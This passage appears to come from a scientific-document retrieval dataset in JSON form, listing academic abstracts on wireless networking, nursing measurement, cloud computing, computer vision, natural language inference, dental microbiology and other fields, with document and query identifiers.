"text": "Low power ad hoc wireless networks operate in conditions where channels are subject to fading. Cooperative diversity mitigates fading in these networks by establishing virtual antenna arrays through clustering the nodes. A cluster in a cooperative diversity network is a collection of nodes that cooperatively transmits a single packet. There are two types of clustering schemes: static and dynamic. In static clustering all nodes start and stop transmission simultaneously, and nodes do not join or leave the cluster while the packet is being transmitted. Dynamic clustering allows a node to join an ongoing cooperative transmission of a packet as soon as the packet is received. In this paper we take a broad view of the cooperative network by examining packet flows, while still faithfully implementing the physical layer at the bit level. We evaluate both clustering schemes using simulations on large multi-flow networks. We demonstrate that dynamically-clustered cooperative networks substantially outperform both statically-clustered cooperative networks and classical point-to-point networks.",
"title": ""
},
{
"docid": "8738ec0c6e265f0248d7fa65de4cdd05",
"text": "BACKGROUND\nCaring traditionally has been at the center of nursing. Effectively measuring the process of nurse caring is vital in nursing research. A short, less burdensome dimensional instrument for patients' use is needed for this purpose.\n\n\nOBJECTIVES\nTo derive and validate a shorter Caring Behaviors Inventory (CBI) within the context of the 42-item CBI.\n\n\nMETHODS\nThe responses to the 42-item CBI from 362 hospitalized patients were used to develop a short form using factor analysis. A test-retest reliability study was conducted by administering the shortened CBI to new samples of patients (n = 64) and nurses (n = 42).\n\n\nRESULTS\nFactor analysis yielded a 24-item short form (CBI-24) that (a) covers the four major dimensions assessed by the 42-item CBI, (b) has internal consistency (alpha =.96) and convergent validity (r =.62) similar to the 42-item CBI, (c) reproduces at least 97% of the variance of the 42 items in patients and nurses, (d) provides statistical conclusions similar to the 42-item CBI on scoring for caring behaviors by patients and nurses, (e) has similar sensitivity in detecting between-patient difference in perceptions, (f) obtains good test-retest reliability (r = .88 for patients and r=.82 for nurses), and (g) confirms high internal consistency (alpha >.95) as a stand-alone instrument administered to the new samples.\n\n\nCONCLUSION\nCBI-24 appears to be equivalent to the 42-item CBI in psychometric properties, validity, reliability, and scoring for caring behaviors among patients and nurses. These results recommend the use of CBI-24 to reduce response burden and research costs.",
"title": ""
},
{
"docid": "1ec80e919d847675ce36ca16b7da0c67",
"text": "After more than 12 years of development, the ninth edition of the Present State Examination (PSE-9) was published, together with associated instruments and computer algorithm, in 1974. The system has now been expanded, in the framework of the World Health Organization/Alcohol, Drug Abuse, and Mental Health Administration Joint Project on Standardization of Diagnosis and Classification, and is being tested with the aim of developing a comprehensive procedure for clinical examination that is also capable of generating many of the categories of the International Classification of Diseases, 10th edition, and the Diagnostic and Statistical Manual of Mental Disorders, revised third edition. The new system is known as SCAN (Schedules for Clinical Assessment in Neuropsychiatry). It includes the 10th edition of the PSE as one of its core schedules, preliminary tests of which have suggested that reliability is similar to that of PSE-9. SCAN is being field tested in 20 centers in 11 countries. A final version is expected to be available in January 1990.",
"title": ""
},
{
"docid": "933bc7cc6e1d56969f9d3fc0157f7ac9",
"text": "This paper presents algorithms and techniques for single-sensor tracking and multi-sensor fusion of infrared and radar data. The results show that fusing radar data with infrared data considerably increases detection range, reliability and accuracy of the object tracking. This is mandatory for further development of driver assistance systems. Using multiple model filtering for sensor fusion applications helps to capture the dynamics of maneuvering objects while still achieving smooth object tracking for not maneuvering objects. This is important when safety and comfort systems have to make use of the same sensor information. Comfort systems generally require smoothly filtered data whereas for safety systems it is crucial to capture maneuvers of other road users as fast as possible. Multiple model filtering and probabilistic data association techniques are presented and all presented algorithms are tested in real-time on standard PC systems.",
"title": ""
},
{
"docid": "3204def0de796db05e4fcc2a86743bb6",
"text": "This keynote paper: (1) presents the 21st century vision of computing and identifies various IT paradigms promising to deliver computing as a utility; (2) defines the architecture for creating market-oriented Clouds and computing atmosphere by leveraging technologies such as virtual machines; (3) provides thoughts on market-based resource management strategies that encompass both customer-driven service management and computational risk management to sustain SLA-oriented resource allocation; (4) presents the work carried out as part of our new Cloud Computing initiative, called Cloudbus: (i) Aneka, a Platform as a Service software system containing SDK (Software Development Kit) for construction of Cloud applications and deployment on private or public Clouds, in addition to supporting market-oriented resource management; (ii) internetworking of Clouds for dynamic creation of federated computing environments for scaling of elastic applications; (iii) creation of 3 party Cloud brokering services for building content delivery networks and e-Science applications and their deployment on capabilities of IaaS providers such as Amazon along with Grid mashups; (iv) CloudSim supporting modelling and simulation of Clouds for performance studies; (v) Energy Efficient Resource Allocation Mechanisms and Techniques for creation and management of Green Clouds; and (vi) pathways for future research.",
"title": ""
},
{
"docid": "9a1c82342355d302b2c10c63bd5d4fd6",
"text": "This paper addresses the problem of estimating the 3D shape of a smooth textureless solid from multiple images acquired under orthographic projection from unknown and unconstrained viewpoints. In this setting, the only reliable image features are the object’s silhouettes, and the only true stereo correspondence between pairs of silhouettes are the frontier points where two viewing rays intersect in the tangent plane of the surface. An algorithm for identifying geometrically-consistent frontier points candidates while estimating the cameras’ projection matrices is presented. This algorithm uses the signature representation of the dual of image silhouettes to identify promising correspondences, and it exploits the redundancy of multiple epipolar geometries to retain the consistent ones. The visual hull of the observed solid is finally reconstructed from the recovered viewpoints. The proposed approach has been implemented, and experiments with six real image sequences are presented, including a comparison between ground-truth and recovered camera configurations, and sample visual hulls computed by the algorithm.",
"title": ""
},
{
"docid": "16880162165f4c95d6b01dc4cfc40543",
"text": "In this paper we present CMUcam3, a low-cost, open source, em bedded computer vision platform. The CMUcam3 is the third generation o f the CMUcam system and is designed to provide a flexible and easy to use ope n source development environment along with a more powerful hardware platfo rm. The goal of the system is to provide simple vision capabilities to small emb dded systems in the form of an intelligent sensor that is supported by an open sou rce community. The hardware platform consists of a color CMOS camera, a frame bu ff r, a low cost 32bit ARM7TDMI microcontroller, and an MMC memory card slot. T he CMUcam3 also includes 4 servo ports, enabling one to create entire, w orking robots using the CMUcam3 board as the only requisite robot processor. Cus tom C code can be developed using an optimized GNU toolchain and executabl es can be flashed onto the board using a serial port without external download ing hardware. The development platform includes a virtual camera target allowi ng for rapid application development exclusively on a PC. The software environment c omes with numerous open source example applications and libraries includi ng JPEG compression, frame differencing, color tracking, convolutions, histog ramming, edge detection, servo control, connected component analysis, FAT file syste m upport, and a face detector.",
"title": ""
},
{
"docid": "04716d649c2fb0a3fa61b026bed80046",
"text": "Episodic memory provides a mechanism for accessing past experiences and has been relatively ignored in comp utational models of cognition. In this paper, we present a fr amework for describing the functional stages for computatio nal models of episodic memory: encoding, storage, retrieval an d use of the retrieved memories. We present two implementati ons of a computational model of episodic memory in Soar. We demonstrate all four stages of the model for a simp le interactive task.",
"title": ""
},
{
"docid": "df5394835b04ceb38a17bf1586a3c456",
"text": "Attention-based neural models have achieved great success in natural language inference (NLI). In this paper, we propose the Convolutional Interaction Network (CIN), a general model to capture the interaction between two sentences, which can be an alternative to the attention mechanism for NLI. Specifically, CIN encodes one sentence with the filters dynamically generated based on another sentence. Since the filters may be designed to have various numbers and sizes, CIN can capture more complicated interaction patterns. Experiments on three very large datasets demonstrate CIN’s efficacy.",
"title": ""
},
{
"docid": "2cf7921cce2b3077c59d9e4e2ab13afe",
"text": "Scientists and consumers preference focused on natural colorants due to the emergence of negative health effects of synthetic colorants which is used for many years in foods. Interest in natural colorants is increasing with each passing day as a consequence of their antimicrobial and antioxidant effects. The biggest obstacle in promotion of natural colorants as food pigment agents is that it requires high investment. For this reason, the R&D studies related issues are shifted to processes to reduce cost and it is directed to pigment production from microorganisms with fermentation. Nowadays, there is pigments obtained by commercially microorganisms or plants with fermantation. These pigments can be use for both food colorant and food supplement. In this review, besides colourant and antioxidant properties, antimicrobial properties of natural colorants are discussed.",
"title": ""
},
{
"docid": "52b8e748a87a114f5d629f8dcd9a7dfc",
"text": "Delay-tolerant networks (DTNs) rely on the mobility of nodes and their contacts to make up with the lack of continuous connectivity and, thus, enable message delivery from source to destination in a “store-carry-forward” fashion. Since message delivery consumes resource such as storage and power, some nodes may choose not to forward or carry others' messages while relying on others to deliver their locally generated messages. These kinds of selfish behaviors may hinder effective communications over DTNs. In this paper, we present an efficient incentive-compatible (IC) routing protocol (ICRP) with multiple copies for two-hop DTNs based on the algorithmic game theory. It takes both the encounter probability and transmission cost into consideration to deal with the misbehaviors of selfish nodes. Moreover, we employ the optimal sequential stopping rule and Vickrey-Clarke-Groves (VCG) auction as a strategy to select optimal relay nodes to ensure that nodes that honestly report their encounter probability and transmission cost can maximize their rewards. We attempt to find the optimal stopping time threshold adaptively based on realistic probability model and propose an algorithm to calculate the threshold. Based on this threshold, we propose a new method to select relay nodes for multicopy transmissions. To ensure that the selected relay nodes can receive their rewards securely, we develop a signature scheme based on a bilinear map to prevent the malicious nodes from tampering. Through simulations, we demonstrate that ICRP can effectively stimulate nodes to forward/carry messages and achieve higher packet delivery ratio with lower transmission cost.",
"title": ""
},
{
"docid": "df0ef093e337d76f4902671065ce4fbc",
"text": "Refactoring, the activity of changing source code design without affecting its external behavior, is a widely used practice among developers, since it is considered to positively affect the quality of software systems. However, there are some \"human factors\" to be considered while performing refactoring, including developers knowledge of systems architecture. Recent studies showed how much \"people\" metrics, such as code ownership, might affect software quality as well. In this preliminary study we investigated the relationship between code ownership and refactoring activity performed by developers. This study can provide useful insights on who performs refactoring and help team leaders to properly manage human resources during software development.",
"title": ""
},
{
"docid": "b97922c2a70b2b197866ecf158e93a68",
"text": "Mobile devices can motivate learners through moving language learning from predominantly classroom–based contexts into contexts that are free from time and space. The increasing development of new applications can offer valuable support to the language learning process and can provide a basis for a new self regulated and personal approach to learning. A key challenge for language teachers is to actively explore the potential of mobile technologies in their own learning so that they can support students in using them. The aim of this paper is first to describe the basic theoretical framework of Mobile Learning and Personal Learning Environments. Secondly, it intends to assist language teachers and learners in building their own Mobile Personal Learning Environment providing a useful classification of iPhone applications with a description and examples. The paper concludes with the proposal of ideas for practical, personal language learning scenarios, piloted in an Italian language learning context. DOI: 10.4018/978-1-4666-2467-2.ch017",
"title": ""
},
{
"docid": "c5efe5fe7c945e48f272496e7c92bb9c",
"text": "Knowing when a classifier’s prediction can be trusted is useful in many applications and critical for safely using AI. While the bulk of the effort in machine learning research has been towards improving classifier performance, understanding when a classifier’s predictions should and should not be trusted has received far less attention. The standard approach is to use the classifier’s discriminant or confidence score; however, we show there exists an alternative that is more effective in many situations. We propose a new score, called the trust score, which measures the agreement between the classifier and a modified nearest-neighbor classifier on the testing example. We show empirically that high (low) trust scores produce surprisingly high precision at identifying correctly (incorrectly) classified examples, consistently outperforming the classifier’s confidence score as well as many other baselines. Further, under some mild distributional assumptions, we show that if the trust score for an example is high (low), the classifier will likely agree (disagree) with the Bayes-optimal classifier. Our guarantees consist of non-asymptotic rates of statistical consistency under various nonparametric settings and build on recent developments in topological data analysis.",
"title": ""
},
{
"docid": "30da5996ad883e41df979fe3640e35ed",
"text": "As an initial assessment, over 480,000 labeled virtual images of normal highway driving were readily generated in Grand Theft Auto V's virtual environment. Using these images, a CNN was trained to detect following distance to cars/objects ahead, lane markings, and driving angle (angular heading relative to lane centerline): all variables necessary for basic autonomous driving. Encouraging results were obtained when tested on over 50,000 labeled virtual images from substantially different GTA-V driving environments. This initial assessment begins to define both the range and scope of the labeled images needed for training as well as the range and scope of labeled images needed for testing the definition of boundaries and limitations of trained networks. It is the efficacy and flexibility of a\"GTA-V\"-like virtual environment that is expected to provide an efficient well-defined foundation for the training and testing of Convolutional Neural Networks for safe driving. Additionally, described is the Princeton Virtual Environment (PVE) for the training, testing and enhancement of safe driving AI, which is being developed using the video-game engine Unity. PVE is being developed to recreate rare but critical corner cases that can be used in re-training and enhancing machine learning models and understanding the limitations of current self driving models. The Florida Tesla crash is being used as an initial reference.",
"title": ""
},
{
"docid": "c8b9efec71a72a1d0f0fc7170efba61d",
"text": "Microorganisms present in our oral cavity which are called the human micro flora attach to our tooth surfaces and develop biofilms. In maximum organic habitats microorganisms generally prevail as multispecies biolfilms with the help of intercellular interactions and communications among them which are the main keys for their endurance. These biofilms are formed by initial attachment of bacteria to a surface, development of a multi –dimensional complex structure and detachment to progress other site. The best example of biofilm formation is dental plaque. Plaque formation can lead to dental caries and other associated diseases causing tooth loss. Many different bacteria are involved in these processes and one among them is Streptococcus mutans which is the principle and the most important agent. When these infections become severe, during the treatment the bacterium can enter the bloodstream from the oral cavity and cause endocarditis. The oral bacterium S. mutans is greatly skilled in its mechanical modes of carbohydrate absorption. It also synthesizes polysaccharides that are present in dental plaque causing caries. As dental caries is a preventable disease major distinct approaches for its prevention are: carbohydrate diet, sugar substitutes, mechanical cleaning techniques, use of fluorides, antimicrobial agents, fissure sealants, vaccines, probiotics, replacement theory and dairy products and at the same time for tooth remineralization fluorides and casein phosphopeptides are extensively employed. The aim of this review article is to put forth the general features of the bacterium S.mutans and how it is involved in certain diseases like: dental plaque, dental caries and endocarditis.",
"title": ""
},
{
"docid": "34181f97c65266c0473b211b1034436b",
"text": "The LMS plays a decisive role in most eLearning environments. Although they integrate many useful tools for managing eLearning activities, they must also be effectively integrated with other specialized systems typically found in an educational environment such as Repositories of Learning Objects or ePortfolio Systems. Both types of systems evolved separately but in recent years the trend is to combine them, allowing the LMS to benefit from using the ePortfolio assessment features. This paper details the most common strategies for integrating an ePortfolio system into an LMS: the data, the API and the tool integration strategies. It presents a comparative study of strategies based on the technical skills, degree of coupling, security features, batch integration, development effort, status and standardization. This study is validated through the integration of two of the most representative systems on each category respectively Mahara and Moodle.",
"title": ""
}
] | scidocsrr |
a53117b8dde817ee8b492e8c71441c11 | Exploring the Spatial Hierarchy of Mixture Models for Human Pose Estimation | [
{
"docid": "1b777ff8e7c30c23e7cc827ec3aee0bc",
"text": "The task of 2-D articulated human pose estimation in natural images is extremely challenging due to the high level of variation in human appearance. These variations arise from different clothing, anatomy, imaging conditions and the large number of poses it is possible for a human body to take. Recent work has shown state-of-the-art results by partitioning the pose space and using strong nonlinear classifiers such that the pose dependence and multi-modal nature of body part appearance can be captured. We propose to extend these methods to handle much larger quantities of training data, an order of magnitude larger than current datasets, and show how to utilize Amazon Mechanical Turk and a latent annotation update scheme to achieve high quality annotations at low cost. We demonstrate a significant increase in pose estimation accuracy, while simultaneously reducing computational expense by a factor of 10, and contribute a dataset of 10,000 highly articulated poses.",
"title": ""
}
] | [
{
"docid": "9e1cefe8c58774ea54b507a3702f825f",
"text": "Organizations and individuals are increasingly impacted by misuses of information that result from security lapses. Most of the cumulative research on information security has investigated the technical side of this critical issue, but securing organizational systems has its grounding in personal behavior. The fact remains that even with implementing mandatory controls, the application of computing defenses has not kept pace with abusers’ attempts to undermine them. Studies of information security contravention behaviors have focused on some aspects of security lapses and have provided some behavioral recommendations such as punishment of offenders or ethics training. While this research has provided some insight on information security contravention, they leave incomplete our understanding of the omission of information security measures among people who know how to protect their systems but fail to do so. Yet carelessness with information and failure to take available precautions contributes to significant civil losses and even to crimes. Explanatory theory to guide research that might help to answer important questions about how to treat this omission problem lacks empirical testing. This empirical study uses protection motivation theory to articulate and test a threat control model to validate assumptions and better understand the ‘‘knowing-doing” gap, so that more effective interventions can be developed. 2008 Elsevier Ltd. All rights reserved. d. All rights reserved. Workman), wbommer@csufresno.edu (W.H. Bommer), dstraub@gsu.edu 2800 M. Workman et al. / Computers in Human Behavior 24 (2008) 2799–2816",
"title": ""
},
{
"docid": "c1500904d01c7210b4ed3de11f44bf79",
"text": "In this paper we propose an approach to improve the direct torque control (DTC) of an induction motor (IM). The proposed DTC is based on fuzzy logic technique switching table, is described compared with conventional direct torque control (DTC). To test the fuzzy control strategy a simulation platform using MATLAB/SIMULINK was built which includes induction motor d-q model, inverter model, fuzzy logic switching table and the stator flux and torque estimator. The simulation results verified the new control strategy.",
"title": ""
},
{
"docid": "737ccd74e69d32ab1fdfec7df9674a4c",
"text": "Data in the sciences frequently occur as sequences of multidimensional arrays called tensors. How can hidden, evolving trends in such data be extracted while preserving the tensor structure? The model that is traditionally used is the linear dynamical system (LDS) with Gaussian noise, which treats the latent state and observation at each time slice as a vector. We present the multilinear dynamical system (MLDS) for modeling tensor time series and an expectation–maximization (EM) algorithm to estimate the parameters. The MLDS models each tensor observation in the time series as the multilinear projection of the corresponding member of a sequence of latent tensors. The latent tensors are again evolving with respect to a multilinear projection. Compared to the LDS with an equal number of parameters, the MLDS achieves higher prediction accuracy and marginal likelihood for both artificial and real datasets.",
"title": ""
},
{
"docid": "a1a4b028fba02904333140e6791709bb",
"text": "Cross-site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. XSS is one of the top 10 vulnerabilities on Web application. While a traditional cross-site scripting vulnerability exploits server-side codes, DOM-based XSS is a type of vulnerability which affects the script code being executed in the clients browser. DOM-based XSS vulnerabilities are much harder to be detected than classic XSS vulnerabilities because they reside on the script codes from Web sites. An automated scanner needs to be able to execute the script code without errors and to monitor the execution of this code to detect such vulnerabilities. In this paper, we introduce a distributed scanning tool for crawling modern Web applications on a large scale and detecting, validating DOMbased XSS vulnerabilities. Very few Web vulnerability scanners can really accomplish this.",
"title": ""
},
{
"docid": "8840e9e1e304a07724dd6e6779cfc9c4",
"text": "Clustering has become an increasingly important task in modern application domains such as marketing and purchasing assistance, multimedia, molecular biology as well as many others. In most of these areas, the data are originally collected at different sites. In order to extract information from these data, they are merged at a central site and then clustered. In this paper, we propose a different approach. We cluster the data locally and extract suitable representatives from these clusters. These representatives are sent to a global server site where we restore the complete clustering based on the local representatives. This approach is very efficient, because the local clustering can be carried out quickly and independently from each other. Furthermore, we have low transmission cost, as the number of transmitted representatives is much smaller than the cardinality of the complete data set. Based on this small number of representatives, the global clustering can be done very efficiently. For both the local and the global clustering, we use a density based clustering algorithm. The combination of both the local and the global clustering forms our new DBDC (Density Based Distributed Clustering) algorithm. Furthermore, we discuss the complex problem of finding a suitable quality measure for evaluating distributed clusterings. We introduce two quality criteria which are compared to each other and which allow us to evaluate the quality of our DBDC algorithm. In our experimental evaluation, we will show that we do not have to sacrifice clustering quality in order to gain an efficiency advantage when using our distributed clustering approach.",
"title": ""
},
{
"docid": "cd2fcc3e8ba9fce3db77c4f1e04ad287",
"text": "Technological advances are being made to assist humans in performing ordinary tasks in everyday settings. A key issue is the interaction with objects of varying size, shape, and degree of mobility. Autonomous assistive robots must be provided with the ability to process visual data in real time so that they can react adequately for quickly adapting to changes in the environment. Reliable object detection and recognition is usually a necessary early step to achieve this goal. In spite of significant research achievements, this issue still remains a challenge when real-life scenarios are considered. In this article, we present a vision system for assistive robots that is able to detect and recognize objects from a visual input in ordinary environments in real time. The system computes color, motion, and shape cues, combining them in a probabilistic manner to accurately achieve object detection and recognition, taking some inspiration from vision science. In addition, with the purpose of processing the input visual data in real time, a graphical processing unit (GPU) has been employed. The presented approach has been implemented and evaluated on a humanoid robot torso located at realistic scenarios. For further experimental validation, a public image repository for object recognition has been used, allowing a quantitative comparison with respect to other state-of-the-art techniques when realworld scenes are considered. Finally, a temporal analysis of the performance is provided with respect to image resolution and the number of target objects in the scene.",
"title": ""
},
{
"docid": "0a95cf6687a8e2421907fb94324c5163",
"text": "The existence of multiple memory systems has been proposed in a number of areas, including cognitive psychology, neuropsychology, and the study of animal learning and memory. We examine whether the existence of such multiple systems seems likely on evolutionary grounds. Multiple systems adapted to serve seemingly similar functions, which differ in important ways, are a common evolutionary outcome. The evolution of multiple memory systems requires memory systems to be specialized to such a degree that the functional problems each system handles cannot be handled by another system. We define this condition as functional incompatibility and show that it occurs for a number of the distinctions that have been proposed between memory systems. The distinction between memory for song and memory for spatial locations in birds, and between incremental habit formation and memory for unique episodes in humans and other primates provide examples. Not all memory systems are highly specialized in function, however, and the conditions under which memory systems could evolve to serve a wide range of functions are also discussed.",
"title": ""
},
{
"docid": "94a5e443ff4d6a6decdf1aeeb1460788",
"text": "Teaching the computer to understand language is the major goal in the field of natural language processing. In this thesis we introduce computational methods that aim to extract language structure— e.g. grammar, semantics or syntax— from text, which provides the computer with information in order to understand language. During the last decades, scientific efforts and the increase of computational resources made it possible to come closer to the goal of understanding language. In order to extract language structure, many approaches train the computer on manually created resources. Most of these so-called supervised methods show high performance when applied to similar textual data. However, they perform inferior when operating on textual data, which are different to the one they are trained on. Whereas training the computer is essential to obtain reasonable structure from natural language, we want to avoid training the computer using manually created resources. In this thesis, we present so-called unsupervisedmethods, which are suited to learn patterns in order to extract structure from textual data directly. These patterns are learned with methods that extract the semantics (meanings) of words and phrases. In comparison to manually built knowledge bases, unsupervised methods are more flexible: they can extract structure from text of different languages or text domains (e.g. finance or medical texts), without requiring manually annotated structure. However, learning structure from text often faces sparsity issues. The reason for these phenomena is that in language many words occur only few times. If a word is seen only few times no precise information can be extracted from the text it occurs. Whereas sparsity issues cannot be solved completely, information about most words can be gained by using large amounts of data. In the first chapter, we briefly describe how computers can learn to understand language. Afterwards, we present the main contributions, list the publications this thesis is based on and give an overview of this thesis. Chapter 2 introduces the terminology used in this thesis and gives a background about natural language processing. Then, we characterize the linguistic theory on how humans understand language. Afterwards, we show how the underlying linguistic intuition can be",
"title": ""
},
{
"docid": "3306636800566050599f051b0939b755",
"text": "We tackle image question answering (ImageQA) problem by learning a convolutional neural network (CNN) with a dynamic parameter layer whose weights are determined adaptively based on questions. For the adaptive parameter prediction, we employ a separate parameter prediction network, which consists of gated recurrent unit (GRU) taking a question as its input and a fully-connected layer generating a set of candidate weights as its output. However, it is challenging to construct a parameter prediction network for a large number of parameters in the fully-connected dynamic parameter layer of the CNN. We reduce the complexity of this problem by incorporating a hashing technique, where the candidate weights given by the parameter prediction network are selected using a predefined hash function to determine individual weights in the dynamic parameter layer. The proposed network-joint network with the CNN for ImageQA and the parameter prediction network-is trained end-to-end through back-propagation, where its weights are initialized using a pre-trained CNN and GRU. The proposed algorithm illustrates the state-of-the-art performance on all available public ImageQA benchmarks.",
"title": ""
},
{
"docid": "73e2c8e754c6a656ebe926c2d6d8225b",
"text": "In this work, we focus on the preservation of user privacy in the publication of sparse multidimensional data. Existing works protect the users’ sensitive information by generalizing or suppressing quasi identifiers in the original data. In many real world cases, neither generalization nor the distinction between sensitive and non-sensitive items is appropriate. For example, web search query logs contain millions of terms that are very hard to categorize as sensitive or non sensitive. At the same time, a generalization-based anonymization would remove the most valuable information in the dataset; the original terms. Motivated by this problem, we propose an anonymization technique termed disassociation that preserves the original terms but hides the fact that two or more different terms appear in the same record. Up to now, such techniques were used to sever the link between quasiidentifiers and sensitive values in settings with a clear distinction between these types of values. Our proposal generalizes these techniques for sparse multidimensional data, where no such distinction holds. We protect the users’ privacy by disassociating combinations of terms that can act as quasi-identifiers from the rest of the record or by disassociating the constituent terms, so that the identifying combination cannot be accurately recognized. To this end, we present an algorithm that anonymizes the data by first clustering them and then locally disassociating identifying combinations of terms. We analyze the attack model and extend the km-anonymity guaranty to the aforementioned setting. We empirically evaluate our method on real and synthetic datasets.",
"title": ""
},
{
"docid": "082f19bb94536f61a7c9e4edd9a9c829",
"text": "Phytoplankton abundance and composition and the cyanotoxin, microcystin, were examined relative to environmental parameters in western Lake Erie during late-summer (2003–2005). Spatially explicit distributions of phytoplankton occurred on an annual basis, with the greatest chlorophyll (Chl) a concentrations occurring in waters impacted by Maumee River inflows and in Sandusky Bay. Chlorophytes, bacillariophytes, and cyanobacteria contributed the majority of phylogenetic-group Chl a basin-wide in 2003, 2004, and 2005, respectively. Water clarity, pH, and specific conductance delineated patterns of group Chl a, signifying that water mass movements and mixing were primary determinants of phytoplankton accumulations and distributions. Water temperature, irradiance, and phosphorus availability delineated patterns of cyanobacterial biovolumes, suggesting that biotic processes (most likely, resource-based competition) controlled cyanobacterial abundance and composition. Intracellular microcystin concentrations corresponded to Microcystis abundance and environmental parameters indicative of conditions coincident with biomass accumulations. It appears that environmental parameters regulate microcystin indirectly, via control of cyanobacterial abundance and distribution.",
"title": ""
},
{
"docid": "dfca655ee52769c9c1d26e8c3f5b883f",
"text": "BACKGROUND\nDihydrocapsiate (DCT) is a natural safe food ingredient which is structurally related to capsaicin from chili pepper and is found in the non-pungent pepper strain, CH-19 Sweet. It has been shown to elicit the thermogenic effects of capsaicin but without its gastrointestinal side effects.\n\n\nMETHODS\nThe present study was designed to examine the effects of DCT on both adaptive thermogenesis as the result of caloric restriction with a high protein very low calorie diet (VLCD) and to determine whether DCT would increase post-prandial energy expenditure (PPEE) in response to a 400 kcal/60 g protein liquid test meal. Thirty-three subjects completed an outpatient very low calorie diet (800 kcal/day providing 120 g/day protein) over 4 weeks and were randomly assigned to receive either DCT capsules three times per day (3 mg or 9 mg) or placebo. At baseline and 4 weeks, fasting basal metabolic rate and PPEE were measured in a metabolic hood and fat free mass (FFM) determined using displacement plethysmography (BOD POD).\n\n\nRESULTS\nPPEE normalized to FFM was increased significantly in subjects receiving 9 mg/day DCT by comparison to placebo (p < 0.05), but decreases in resting metabolic rate were not affected. Respiratory quotient (RQ) increased by 0.04 in the placebo group (p < 0.05) at end of the 4 weeks, but did not change in groups receiving DCT.\n\n\nCONCLUSIONS\nThese data provide evidence for postprandial increases in thermogenesis and fat oxidation secondary to administration of dihydrocapsiate.\n\n\nTRIAL REGISTRATION\nclinicaltrial.govNCT01142687.",
"title": ""
},
{
"docid": "375b2025d7523234bb10f5f16b2b0764",
"text": "In this paper, we present a system including a novel component called programmable aperture and two associated post-processing algorithms for high-quality light field acquisition. The shape of the programmable aperture can be adjusted and used to capture light field at full sensor resolution through multiple exposures without any additional optics and without moving the camera. High acquisition efficiency is achieved by employing an optimal multiplexing scheme, and quality data is obtained by using the two post-processing algorithms designed for self calibration of photometric distortion and for multi-view depth estimation. View-dependent depth maps thus generated help boost the angular resolution of light field. Various post-exposure photographic effects are given to demonstrate the effectiveness of the system and the quality of the captured light field.",
"title": ""
},
{
"docid": "c444da1de06518f4b20db3ea99b327da",
"text": "Allowing computation to be performed at the edge of a network, edge computing has been recognized as a promising approach to address some challenges in the cloud computing paradigm, particularly to the delay-sensitive and mission-critical applications like real-time surveillance. Prevalence of networked cameras and smart mobile devices enable video analytics at the network edge. However, human objects detection and tracking are still conducted at cloud centers, as real-time, online tracking is computationally expensive. In this paper, we investigated the feasibility of processing surveillance video streaming at the network edge for real-time, uninterrupted moving human objects tracking. Moving human detection based on Histogram of Oriented Gradients (HOG) and linear Support Vector Machine (SVM) is illustrated for features extraction, and an efficient multi-object tracking algorithm based on Kernelized Correlation Filters (KCF) is proposed. Implemented and tested on Raspberry Pi 3, our experimental results are very encouraging, which validated the feasibility of the proposed approach toward a real-time surveillance solution at the edge of networks.",
"title": ""
},
{
"docid": "3b5555c5624fc11bbd24cfb8fff669f0",
"text": "Redundancy resolution is a critical problem in the control of robotic manipulators. Recurrent neural networks (RNNs), as inherently parallel processing models for time-sequence processing, are potentially applicable for the motion control of manipulators. However, the development of neural models for high-accuracy and real-time control is a challenging problem. This paper identifies two limitations of the existing RNN solutions for manipulator control, i.e., position error accumulation and the convex restriction on the projection set, and overcomes them by proposing two modified neural network models. Our method allows nonconvex sets for projection operations, and control error does not accumulate over time in the presence of noise. Unlike most works in which RNNs are used to process time sequences, the proposed approach is model-based and training-free, which makes it possible to achieve fast tracking of reference signals with superior robustness and accuracy. Theoretical analysis reveals the global stability of a system under the control of the proposed neural networks. Simulation results confirm the effectiveness of the proposed control method in both the position regulation and tracking control of redundant PUMA 560 manipulators.",
"title": ""
},
{
"docid": "eadc50aebc6b9c2fbd16f9ddb3094c00",
"text": "Instance segmentation is the problem of detecting and delineating each distinct object of interest appearing in an image. Current instance segmentation approaches consist of ensembles of modules that are trained independently of each other, thus missing opportunities for joint learning. Here we propose a new instance segmentation paradigm consisting in an end-to-end method that learns how to segment instances sequentially. The model is based on a recurrent neural network that sequentially finds objects and their segmentations one at a time. This net is provided with a spatial memory that keeps track of what pixels have been explained and allows occlusion handling. In order to train the model we designed a principled loss function that accurately represents the properties of the instance segmentation problem. In the experiments carried out, we found that our method outperforms recent approaches on multiple person segmentation, and all state of the art approaches on the Plant Phenotyping dataset for leaf counting.",
"title": ""
},
{
"docid": "fa58c34ecd5544069fa3c58130c0f941",
"text": "Design patterns provide good solutions to re-occurring problems and several patterns and methods how to apply them have been documented for safety-critical systems. However, due to the large amount of safety-related patterns and methods, it is difficult to get an overview of their capabilities and shortcomings as there currently is no survey on safety patterns and their application methods available in literature.\n To give an overview of existing pattern-based safety development methods, this paper presents existing methods from literature and discusses and compares several aspects of these methods such as the patterns and tools they use, their integration into a safety development process, or their maturity.",
"title": ""
},
{
"docid": "998bf65b2e95db90eb9fab8e13b47ff6",
"text": "Recently, deep neural networks (DNNs) have been regarded as the state-of-the-art classification methods in a wide range of applications, especially in image classification. Despite the success, the huge number of parameters blocks its deployment to situations with light computing resources. Researchers resort to the redundancy in the weights of DNNs and attempt to find how fewer parameters can be chosen while preserving the accuracy at the same time. Although several promising results have been shown along this research line, most existing methods either fail to significantly compress a well-trained deep network or require a heavy fine-tuning process for the compressed network to regain the original performance. In this paper, we propose the Block Term networks (BT-nets) in which the commonly used fully-connected layers (FC-layers) are replaced with block term layers (BT-layers). In BT-layers, the inputs and the outputs are reshaped into two low-dimensional high-order tensors, then block-term decomposition is applied as tensor operators to connect them. We conduct extensive experiments on benchmark datasets to demonstrate that BT-layers can achieve a very large compression ratio on the number of parameters while preserving the representation power of the original FC-layers as much as possible. Specifically, we can get a higher performance while requiring fewer parameters compared with the tensor train method.",
"title": ""
},
{
"docid": "ec7b348a0fe38afa02989a22aa9dcac2",
"text": "We propose a general framework for learning from labeled and unlabeled data on a directed graph in which the structure of the graph including the directionality of the edges is considered. The time complexity of the algorithm derived from this framework is nearly linear due to recently developed numerical techniques. In the absence of labeled instances, this framework can be utilized as a spectral clustering method for directed graphs, which generalizes the spectral clustering approach for undirected graphs. We have applied our framework to real-world web classification problems and obtained encouraging results.",
"title": ""
}
] | scidocsrr |
fb4c8f46186e497d3099f19e91d2c6b6 | On the Necessity of a Prescribed Block Validity Consensus: Analyzing Bitcoin Unlimited Mining Protocol | [
{
